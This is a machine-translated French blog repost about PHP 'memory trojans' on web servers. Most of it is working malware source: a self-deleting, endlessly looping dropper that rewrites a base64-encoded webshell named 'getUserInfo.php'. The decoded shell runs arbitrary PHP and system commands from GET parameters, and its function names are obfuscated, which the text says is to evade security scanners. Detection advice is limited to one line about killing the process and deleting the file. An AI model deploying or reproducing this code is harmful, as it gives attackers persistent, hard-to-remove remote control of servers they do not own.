Vous emmène analyser le principe de mise en œuvre du virus cheval de Troie mémoire PHP

藏色散人
Libérer: 2023-04-11 08:14:01
avant
3602 Les gens l'ont consulté

Avant-propos

Les chevaux de Troie mémoire sont des virus chevaux de Troie qui s'exécutent en mémoire et n'ont aucune entité de code. Les chevaux de Troie à mémoire sont hautement dissimulés, difficiles à détecter et impossibles à tuer (communément appelés chevaux immortels).

Le secteur de la sécurité des réseaux a un fort effet baril. Le système lutte contre les chapeaux noirs, et le résultat dépend du maillon le plus faible de la sécurité. Chapeau noir contre chapeau blanc, le résultat dépend du niveau d’attaque et du niveau de dissimulation et de destruction.

Le texte principal ne précise pas si un morceau de code malveillant était accessible au serveur de production en raison de téléchargements de fichiers arbitraires ou d'attaques proches de la source.

Code source du virus (très simple)

<?php
//设置脚本不超时
set_time_limit(0);ignore_user_abort(true);
//删除文件本体
@unlink(__FILE__);
//给木马病毒起一个迷惑性的名字
$file = &#39;./getUserInfo.php&#39;;
//死循环常驻内存。释放木马文件
while(true) {
 if(! file_exists($file)) @file_put_contents($file, base64_decode(&#39;PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0=&#39;));
 sleep(60);
}
Copier après la connexion

Libérez le corps du virus

<?php
//以下代码实现了eval关键字和system函数的伪装
//eval($_GET[&#39;e&#39;]);
if($e = @$_GET[&#39;e&#39;]) {
    $func = @create_function(null, base64_decode(&#39;ZXZhbCgi&#39;) . $e . base64_decode(&#39;Iik7&#39;));
    $func();
}
//system($_GET[&#39;s&#39;]);
if($s = @$_GET[&#39;s&#39;]) {
    $f = str_replace(&#39;x&#39;, &#39;&#39;, &#39;xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx&#39;);
    $f($s);
}
Copier après la connexion

Instructions

  • Les codes sensibles clés ci-dessus sont codés pour éviter diverses analyses de sécurité.

  • Une fois l'échantillon de virus exécuté, il se supprimera et restera longtemps en mémoire.

  • Même si le cheval de Troie publié est détecté et supprimé, les mêmes fichiers seront toujours générés.

Solution

Après avoir arrêté le processus, supprimez le fichier du cheval de Troie publié.

Recommandé : "Tutoriel vidéo PHP"

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Étiquettes associées:
php
source:learnku.com
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal